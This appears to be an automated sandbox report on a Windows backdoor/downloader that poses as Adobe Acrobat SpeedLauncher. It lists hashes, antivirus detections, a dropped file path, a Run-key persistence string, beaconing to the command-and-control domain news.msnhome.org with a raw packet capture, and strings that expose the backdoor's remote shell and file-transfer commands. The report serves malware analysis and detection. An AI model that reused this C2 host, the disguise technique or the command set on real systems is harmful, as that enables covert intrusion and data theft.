Analysis Date2014-01-03 10:49:16
MD5fab6b0b33d59f393e142000f128a9652
SHA1548ae86f67b89023165ce9000f88b3f7d9f0bdfe

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section.rdata md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section.data md5: 38034359e0e63aa5248ce898e6f6e971 sha1: 53e178beee9cee8591dcdfac58c680ec956487df size: 2560
Section.rsrc md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp2010-11-17 13:37:00
VersionLegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileVersion: 9.0.0.332
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 9, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash35fb281c5f462171ab2f2a96af23e2c56b514ad6
AVaviraTR/Downloader.Gen
AVclamavWin.Trojan.Agent-65195
AVmcafeeRDN/Downloader.a!bi
AVavgAgent2.BVRT
AVmsseBackdoor:Win32/Likseput.B

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates MutexGLOBAL\MSFT64
Winsock URLhttp://news.msnhome.org/public.html

Network Details:

DNSnews.msnhome.org
Type: A
207.46.31.61
DNSnews.msnhome.org
Type: A
65.55.39.12
HTTP GEThttp://news.msnhome.org/public.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 00:29
Flows TCP192.168.1.1:1031 ➝ 207.46.31.61:80

Raw Pcap
0x00000000 (00000)   47455420 2f707562 6c69632e 68746d6c   GET /public.html
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20382e30 3b205769 6e646f77   MSIE 8.0; Window
0x00000050 (00080)   73204e54 20352e31 3b20434f 4d505554   s NT 5.1; COMPUT
0x00000060 (00096)   45522d58 58585858 583b5472 6964656e   ER-XXXXXX;Triden
0x00000070 (00112)   742f342e 30292030 303a3239 200d0a48   t/4.0) 00:29 ..H
0x00000080 (00128)   6f73743a 206e6577 732e6d73 6e686f6d   ost: news.msnhom
0x00000090 (00144)   652e6f72 670d0a43 61636865 2d436f6e   e.org..Cache-Con
0x000000a0 (00160)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000b0 (00176)   0d0a                                  ..


Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVVWV
QVVVPVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t:hLU@
t<Ht2Ht(Ht
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
VPPPPh
VVhlQ@
VVVhX,@
WaitForSingleObject
whoami
width=
WININET.dll
WPhdR@
WriteConsoleInputA
WriteFile
_XcptFilter
YYh0U@
YYSSSSS
YYSSSVSS
YYt5j\
YYWWVh
YYWWVh93@
ZRichw